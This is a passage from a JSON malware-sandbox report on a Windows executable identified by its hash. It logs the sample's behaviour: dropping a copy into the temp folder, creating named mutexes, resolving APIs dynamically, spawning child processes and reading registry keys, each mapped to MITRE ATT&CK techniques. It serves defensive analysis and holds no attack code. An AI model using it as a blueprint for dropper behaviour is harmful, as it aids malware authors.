"\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002904)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002996)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0f00100000fc3077@ADVAPI32.dll\"\n \"15001600c03ee96a@ADVAPI32.dll\"\n \"0e000f00703fe96a@ADVAPI32.dll\"\n \"0e000f00cc3fe96a@ADVAPI32.dll\"\n \"11001200b447e96a@ADVAPI32.dll\"\n \"110012004848e96a@ADVAPI32.dll\"\n \"120013008c48e96a@ADVAPI32.dll\"\n \"12001300e448e96a@ADVAPI32.dll\"\n \"14001500386ee96a@ADVAPI32.dll\"\n \"14001500506ee96a@ADVAPI32.dll\"\n \"14001500686ee96a@ADVAPI32.dll\"\n \"17001800806ee96a@ADVAPI32.dll\"\n \"0d000e00986ee96a@ADVAPI32.dll\"\n \"11001200a86ee96a@ADVAPI32.dll\"\n \"11001200bc6ee96a@ADVAPI32.dll\"\n \"0d000e004466e96a@WININET.dll\"\n \"0d000e00b466e96a@WININET.dll\"\n \"10001100ec66e96a@WININET.dll\"\n \"100011009067e96a@WININET.dll\"\n \"10001100006fe96a@WININET.dll\"\n \"10001100146fe96a@WININET.dll\"\n \"14001500286fe96a@WININET.dll\"\n \"14001500406fe96a@WININET.dll\"\n \"12001300586fe96a@WININET.dll\"\n \"120013006c6fe96a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"CreateProcessW\" with parameter \":*C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe *\" - (UID: 00000000-00002904)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXRSTG\" - (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70990000\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"KERNEL32\" at base 76ff0000\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bcc0000\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"KERNEL32.DLL\" at base 76ff0000\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e80000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e80000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 74d00000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 75310000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 756c0000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 74ff0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70840000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75040000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77280000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 76ff0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002904)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".data\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".bss\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".idata\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".CRT\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".tls\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75310000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75310000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7 ...\" (UID: 00000000-00002876)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXRSTG\" (UID: 00000000-00002996)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7 ...\" (UID: 00000000-00002876)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXRSTG\" (UID: 00000000-00002996)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" was detected as \"MinGW\" and name: \"Compiler\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" reads file \"c:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" 